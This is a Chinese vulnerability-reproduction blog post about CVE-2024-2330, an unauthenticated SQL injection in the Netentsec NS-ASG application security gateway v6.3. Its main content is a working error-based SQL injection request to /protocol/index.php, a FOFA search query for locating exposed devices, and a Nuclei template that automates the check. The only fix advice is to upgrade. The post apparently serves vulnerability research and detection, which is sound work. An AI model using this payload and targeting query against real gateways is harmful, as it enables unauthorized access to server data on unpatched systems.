当前位置：首页 > news >正文

【漏洞复现】网康科技 NS-ASG 应用安全网关 SQL注入漏洞(CVE-2024-2330)

news 2026/2/10 23:48:15

免责声明：文章来源互联网收集整理，请勿利用文章内的相关技术从事非法测试，由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失，均由使用者本人负责，所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

Ⅰ、漏洞描述

网康科技的NS-ASG应用安全网关是一款软硬件一体化的产品，集成了SSL和IPSec，旨在保障业务访问的安全性，适配所有移动终端，提供多种链路均衡和选择技术，支持多种认证方式灵活组合，以及内置短信认证、LDAP令牌、USB KEY等多达13种认证方式。

由于网康科技 NS-ASG 应用安全网关 /protocol/firewall/uploadmacbind.php文件没有对用户输入的参数进行严格的校验和过滤，导致输入的语句直接插入到数据库执行造成SQL注入，未经身份验证的攻击者可以远程发起攻击获取服务器敏感数据。

影响范围

NS-ASG 应用安全网关 v6.3

Ⅱ、fofa语句

app="网康科技-NS-ASG安全网关"

Ⅲ、漏洞复现

POC

POST /protocol/index.php HTTP/1.1
Host:127.0.0.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Length: 0jsoncontent={"protocolType":"uploadmacbind","messagecontent":["1'and(updatexml(1,concat(0x7e,(select+version()),0x7e),1))='"]}

1、发送数据包，查询当前数据库版本

Ⅳ、Nuclei-POC

id: WangKang-NS-ASG-uploadmacbind-SQLinfo:name: 由于网康科技 NS-ASG 应用安全网关 /protocol/firewall/uploadmacbind.php文件没有对用户输入的参数进行严格的校验和过滤，导致输入的语句直接插入到数据库执行造成SQL注入，未经身份验证的攻击者可以远程发起攻击获取服务器敏感数据。author: WLFseverity: highmetadata: fofa-query: app="网康科技-NS-ASG安全网关"
variables:filename: "{{to_lower(rand_base(5))}}"boundary: "{{to_lower(rand_base(20))}}"
http:- raw:- |POST /protocol/index.php HTTP/1.1Host:{{Hostname}}Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36Content-Length: 0jsoncontent={"protocolType":"uploadmacbind","messagecontent":["1'and(updatexml(1,concat(0x7e,(select+version()),0x7e),1))='"]}matchers:- type: dsldsl:- status_code==200 && contains_all(body,"nXPATH syntax error")

Ⅴ、修复建议

升级至安全版本

【漏洞复现】网康科技 NS-ASG 应用安全网关 SQL注入漏洞(CVE-2024-2330)

Ⅰ、漏洞描述

Ⅱ、fofa语句

Ⅲ、漏洞复现

1、发送数据包，查询当前数据库版本

Ⅳ、Nuclei-POC

Ⅴ、修复建议

相关文章：

【漏洞复现】网康科技 NS-ASG 应用安全网关 SQL注入漏洞(CVE-2024-2330)

2024年华为OD机试真题-查找众数及中位数-Java-OD统一考试（C卷）

力扣思路题：重复的子字符串

同城即配年度观察：顺丰同城率先全年盈利，行业破局迎参考

线上机器 swap 过高导致告警

案例分析篇13：系统分析与设计考点（2024年软考高级系统架构设计师冲刺知识点总结系列文章）

算法（结合算法图解）

Linux-多线程

深入解析C++树形关联式容器：map、set及其衍生容器的使用与原理

c++基础知识（一）

Midjourney绘图欣赏系列【人物篇】（一）

2024 年 2 月 NFT 行业动态：加密货币飙升，NFT 市场调整

【C++那些事儿】深入理解C++类与对象：从概念到实践（下）| 再谈构造函数（初始化列表）| explicit关键字 | static成员 | 友元

前端面试 ===＞【Vue2】

面试 Java 并发编程八股文十问十答第四期

物体检测-系列教程27：YOLOV5 源码解析17（训练脚本解读：训练函数4）

基于51单片机的数字时钟（万年历）设计与实现

2024年谷歌SEO的趋势预测及应对建议（川圣SEO）蜘蛛池

Rust 生命周期符号使用的方法和规律

生成哈夫曼树（100%用例）C卷(JavaPythonC++Node.jsC语言)

R语言AI模型部署方案：精准离线运行详解

Objective-C常用命名规范总结

ESP32读取DHT11温湿度数据

LLM基础1_语言模型如何处理文本

vue3+vite项目中使用.env文件环境变量方法

【HarmonyOS 5 开发速记】如何获取用户信息（头像/昵称/手机号）

智能分布式爬虫的数据处理流水线优化：基于深度强化学习的数据质量控制

#Uniapp篇：chrome调试unapp适配

pikachu靶场通关笔记19 SQL注入02-字符型注入(GET)

深入浅出Diffusion模型：从原理到实践的全方位教程